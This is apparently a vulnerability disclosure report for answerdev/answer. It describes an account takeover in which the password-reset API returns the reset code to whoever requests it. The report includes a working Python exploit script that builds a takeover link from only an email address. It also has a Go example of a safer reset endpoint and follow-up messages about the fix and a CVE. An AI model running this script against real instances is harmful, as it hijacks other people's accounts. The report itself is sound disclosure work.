Account Takeover via reset password in answerdev/answer
Reported on
Jan 24th 2023
Description
Password recovery leads to Account Take Over due to reset code leakage.
Proof of Concept
Create an account on https://meta.answer.dev/, verify the email address, then log out.
Go to password recovery (https://meta.answer.dev/users/account-recovery), enter your email and capture the server response, which will look like the following:
{"code":200,"reason":"base.success","msg":"Success.","data":"CODE"}
Copy the "data" token, then go to
https://meta.answer.dev/users/password-reset?code=[CODE]
ATO :)
Impact
Compromise any account knowing only its email address.
Script
Attached this script so you don't have to use Burp Suite :)
from sys import argv
import urllib3
from requests import post

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def ato(url: list, email: str) -> str:
    # Request a reset for the given address and build the reset link
    # from the code the API returns in the "data" field of its response.
    try:
        return f"Your Link: {''.join(url)}users/password-reset?code=" + \
            post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
    except Exception as err:
        return f"Can't reach URL: {err}"


if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
        exit()
    # Ensure the base URL ends with a slash before the paths are appended.
    print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))
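The root cause is that the reset endpoint hands the recovery code back to whoever asked for it, so the e-mail step never matters. The following Go program is an added example of how such an endpoint should behave; it is not the answerdev/answer code or its fix. It is a hypothetical, in-memory `ResetService` (the user table and the mail sender are constructed stand-ins) whose handler accepts the same `{"e_mail": ...}` body the report's script sends and returns the same `{"code":200,"reason":"base.success","msg":"Success."}` envelope, but with `data` always null: the code is generated from `crypto/rand`, only its SHA-256 hash is stored, it is delivered solely through the mail channel, it expires, it is compared in constant time and it is single-use. The response is identical for unknown addresses so the endpoint does not confirm which e-mails are registered.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
	"time"
)

// APIResponse mirrors the envelope shape quoted in the report.
type APIResponse struct {
	Code   int         `json:"code"`
	Reason string      `json:"reason"`
	Msg    string      `json:"msg"`
	Data   interface{} `json:"data"`
}

// resetEntry stores only a hash of the code, so a database read yields nothing usable.
type resetEntry struct {
	codeHash [32]byte
	expires  time.Time
}

// ResetService is a hypothetical in-memory stand-in for the user store and the mailer.
type ResetService struct {
	mu      sync.Mutex
	users   map[string]bool       // constructed user table: email -> exists
	pending map[string]resetEntry // email -> outstanding (hashed) reset code
	mailed  map[string]string     // constructed mail sink: email -> last code sent
	ttl     time.Duration
}

func NewResetService(users []string, ttl time.Duration) *ResetService {
	s := &ResetService{users: map[string]bool{}, pending: map[string]resetEntry{}, mailed: map[string]string{}, ttl: ttl}
	for _, u := range users {
		s.users[u] = true
	}
	return s
}

func hashCode(code string) [32]byte { return sha256.Sum256([]byte(code)) }

// RequestReset sends the code through the mail channel only; the HTTP response
// carries no secret and is the same whether or not the address is registered.
func (s *ResetService) RequestReset(email string) (APIResponse, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return APIResponse{}, fmt.Errorf("generating reset code: %w", err)
	}
	code := hex.EncodeToString(buf)
	s.mu.Lock()
	defer s.mu.Unlock()
	if s.users[email] {
		s.pending[email] = resetEntry{codeHash: hashCode(code), expires: time.Now().Add(s.ttl)}
		s.mailed[email] = code // a real deployment sends the e-mail here
	}
	return APIResponse{Code: 200, Reason: "base.success", Msg: "Success.", Data: nil}, nil
}

// ConsumeCode checks expiry, compares in constant time and invalidates the code on success.
func (s *ResetService) ConsumeCode(email, code string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	e, ok := s.pending[email]
	if !ok {
		return false
	}
	if time.Now().After(e.expires) {
		delete(s.pending, email)
		return false
	}
	h := hashCode(code)
	if subtle.ConstantTimeCompare(h[:], e.codeHash[:]) != 1 {
		return false
	}
	delete(s.pending, email)
	return true
}

// MailedCode reads the constructed mail sink ("" if nothing was sent to that address).
func (s *ResetService) MailedCode(email string) string {
	s.mu.Lock()
	defer s.mu.Unlock()
	return s.mailed[email]
}

// Handler decodes the {"e_mail": ...} body shape used by the report's script.
func (s *ResetService) Handler() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		var body struct {
			Email string `json:"e_mail"`
		}
		if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
			http.Error(w, "bad request", http.StatusBadRequest)
			return
		}
		resp, err := s.RequestReset(body.Email)
		if err != nil {
			http.Error(w, "internal error", http.StatusInternalServerError)
			return
		}
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(resp)
	}
}

// Demo runs the handler in an httptest server and reports the raw body, whether the
// mailed code appeared in it, and whether the code works exactly once.
func Demo() (body string, leaked, consumed, replay bool, err error) {
	svc := NewResetService([]string{"victim@example.test"}, 15*time.Minute)
	srv := httptest.NewServer(svc.Handler())
	defer srv.Close()
	resp, err := http.Post(srv.URL+"/answer/api/v1/user/password/reset", "application/json",
		strings.NewReader(`{"e_mail":"victim@example.test"}`))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	raw, err := io.ReadAll(resp.Body)
	if err != nil {
		return
	}
	body = string(raw)
	code := svc.MailedCode("victim@example.test")
	leaked = strings.Contains(body, code)
	consumed = svc.ConsumeCode("victim@example.test", code)
	replay = svc.ConsumeCode("victim@example.test", code)
	return
}

func main() {
	body, leaked, consumed, replay, err := Demo()
	fmt.Printf("response=%s leaked=%v consumed=%v replay=%v err=%v\n", strings.TrimSpace(body), leaked, consumed, replay, err)
}
```

`Demo` performs the same check the report's script does, reading the reset response and looking for the code in it, and with this handler that search fails; the only copy of the code lives in the mail sink. The `ConsumeCode` path is where the `password-reset?code=` page would validate the link.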
Thank you very much for your validation. Do you need anything else at the moment?
Hello, how are you doing?
I have seen a commit where you have fixed the bug. https://github.com/answerdev/answer/commit/c1fa2b13f6b547b96da60b23350bbe2b29de542d
Could you please link the commit to the report and assign a CVE?
Thank you in advance. Best regards.
@admin no response in this thread since report validation, could you start the CVE assignment process please?
I have contacted an answerdev member privately, they want to keep the report private until the new release comes out. Is it possible to start the CVE assignment process without making the report public?